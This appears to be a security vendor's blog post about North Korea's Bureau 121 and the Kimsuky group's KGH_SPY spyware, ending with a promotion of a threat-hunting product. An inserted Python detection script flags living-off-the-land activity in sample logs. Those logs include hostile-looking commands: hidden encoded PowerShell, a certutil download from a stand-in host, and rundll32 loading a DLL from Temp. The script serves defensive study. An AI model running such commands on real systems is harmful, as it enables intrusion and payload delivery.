The Reconnaissance Bureau of the General Staff (RBG) is the intelligence organization responsible for some of North Korea’s more clandestine activities. Its mission includes activities such as cyber espionage and cyber warfare and it is responsible for the infamous Bureau 121. This agency is practically a legend among the cybersecurity community. It first came to light in December 2014, when it launched a cyberattack on the systems of Sony Pictures during the release of the movie The Interview, a comedy set in North Korea and parodying leader Kim Jong-Un.

Moreover, in July this year, the US Army released a report entitled North Korean Tactics. One section of this report looked specifically at electronic warfare (EW) and described Bureau 121. The report estimates that the agency has some 6,000 members, with most of them operating outside North Korea, in places such as Russia, Belarus, and China. This is down to the fact that the country itself does not have an IT infrastructure capable of carrying out large-scale attacks, mainly due to international sanctions that hinder attempts to import electronic components and systems. Nevertheless, the report underlines the agency’s high level of development and indicates that it has been able to infiltrate secure systems and steal South Korean military secrets. In addition, it coordinates several APT groups more or less directly.

APT group with a new spyware tool_

One such APT group is Kimsuky. Towards the end of October, US security agencies posted an alert describing its tactics, techniques, and procedures (TTPs). The main findings were:

  • The group has been active since 2012.
  • The North Korean regime tasks it with intelligence-gathering and cyber espionage missions against both individuals and organizations, many of them located in South Korea, Japan, and the USA.
  • Intelligence gathering activities focus on foreign policy and national security issues related to the Korean Peninsula, nuclear policies, and sanctions.
  • It usually targets people and think tanks identified as experts in areas such as atomic energy, international relations, and defense and security.
  • Techniques used include social engineering, spear phishing, and watering-hole attacks.

To make matters worse, other cybersecurity analysts have revealed that the group has recently gained new capabilities with a tool called KGH_SPY. This multi-component spyware package collects sensitive data, spies on users, executes commands, and installs backdoors. It can also collect data from browsers, Windows Credential Manager, WinSCP, and email clients. More concerning still, according to analysts, common antivirus solutions do not detect it.

Threat hunting against LOTL_

Malware such as KGH_SPY, developed by state-sponsored APT groups, is often highly sophisticated and uses Living Off The Land (LOTL) techniques: it abuses legitimate, already-installed system tools rather than dropping easily recognizable binaries. For this reason, as analysts have demonstrated, traditional cybersecurity solutions have not been able to detect it.

When it comes to threats like these, CISOs in both private and governmental organizations need advanced solutions that include threat-hunting services and the ability to investigate attacks based on LOTL techniques, so that they can respond rapidly.
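As an added example (not part of the original post and not Cytomic Orion's code), the following Python script shows the kind of hypothesis-driven hunting the paragraph describes: a few generic LOTL hunting rules run over constructed, Sysmon-style process-creation events. The log lines, their field layout, and the rule names are all constructed for this illustration. The behaviours the rules flag (an Office application spawning a script host, PowerShell launched with an encoded command, certutil used to download or decode, rundll32 loading a DLL from a user-writable directory) are widely documented LOTL patterns in general, not specifics of KGH_SPY, which the post does not describe.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# Field layout, assumed for this example: timestamp|host|user|parent_image|image|command_line
# The base64 after -enc is the literal placeholder "PLACEHOLDER", not a real payload.
SAMPLE_EVENTS = [
    "2020-11-18T09:12:01|host01|alice|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"
    "C:\\Windows\\System32\\cmd.exe|cmd.exe /c powershell -nop -w hidden -enc UExBQ0VIT0xERVI=",
    "2020-11-18T09:13:40|host01|alice|C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt",
    "2020-11-18T09:15:22|host02|bob|C:\\Windows\\System32\\cmd.exe|"
    "C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/u.txt "
    "C:\\Users\\bob\\AppData\\Local\\Temp\\u.txt",
    "2020-11-18T09:16:05|host02|bob|C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\rundll32.exe|rundll32.exe C:\\Users\\bob\\AppData\\Local\\Temp\\update.dll,Start",
    "2020-11-18T09:17:30|host03|SYSTEM|C:\\Windows\\System32\\services.exe|"
    "C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "2020-11-18T09:18:11|host03|carol|C:\\Windows\\System32\\cmd.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-ChildItem -Recurse",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
# Directories an unprivileged user can normally write to.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|public|programdata)\\", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)(?=\s|$)", re.IGNORECASE)


@dataclass
class ProcessEvent:
    timestamp: str
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str

    @property
    def parent_name(self) -> str:
        return self.parent_image.rsplit("\\", 1)[-1].lower()

    @property
    def image_name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Split one pipe-delimited event; the command line may itself contain pipes."""
    parts = line.split("|", 5)
    if len(parts) != 6:
        raise ValueError(f"malformed event: {line!r}")
    return ProcessEvent(*parts)


# Each rule returns a human-readable reason when the event matches, else None.
def rule_office_spawns_script_host(ev: ProcessEvent) -> Optional[str]:
    if ev.parent_name in OFFICE_PARENTS and ev.image_name in SCRIPT_HOSTS:
        return f"office application {ev.parent_name} spawned {ev.image_name}"
    return None


def rule_encoded_powershell(ev: ProcessEvent) -> Optional[str]:
    if "powershell" in ev.command_line.lower() and ENCODED_FLAG.search(ev.command_line):
        return "powershell launched with an encoded command"
    return None


def rule_certutil_download_or_decode(ev: ProcessEvent) -> Optional[str]:
    if ev.image_name == "certutil.exe" and re.search(r"-(?:urlcache|decode|encode)\b",
                                                     ev.command_line, re.IGNORECASE):
        return "certutil used to download or transform a file"
    return None


def rule_loader_from_user_writable_path(ev: ProcessEvent) -> Optional[str]:
    if ev.image_name in LOADERS and USER_WRITABLE.search(ev.command_line):
        return f"{ev.image_name} loading content from a user-writable path"
    return None


RULES: List[Callable[[ProcessEvent], Optional[str]]] = [
    rule_office_spawns_script_host,
    rule_encoded_powershell,
    rule_certutil_download_or_decode,
    rule_loader_from_user_writable_path,
]


@dataclass
class Finding:
    event: ProcessEvent
    reasons: List[str]


def hunt(lines: List[str]) -> List[Finding]:
    """Run every rule over every event; keep events that trip at least one rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reasons = [r for r in (rule(ev) for rule in RULES) if r]
        if reasons:
            findings.append(Finding(ev, reasons))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.event.timestamp} {f.event.host} {f.event.user}: {'; '.join(f.reasons)}")
```

Rules of this kind are deliberately coarse: they exist to surface candidates for an analyst to triage, not to block anything, which is why the example returns the matching reasons alongside each event rather than a verdict. A first filtering pass on the output would typically be to match the parent process and user against a per-host baseline to suppress known-good administrative activity.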

Cytomic Orion standardizes these processes. Our cloud solution helps analysts rapidly correlate events, test hypotheses, and minimize investigation, detection, and response times. Analysts are therefore supported at every stage of triage, investigation, and immediate response, and are better prepared to identify and respond to the complex threats that organizations such as Kimsuky and Bureau 121 have clearly shown they are capable of executing.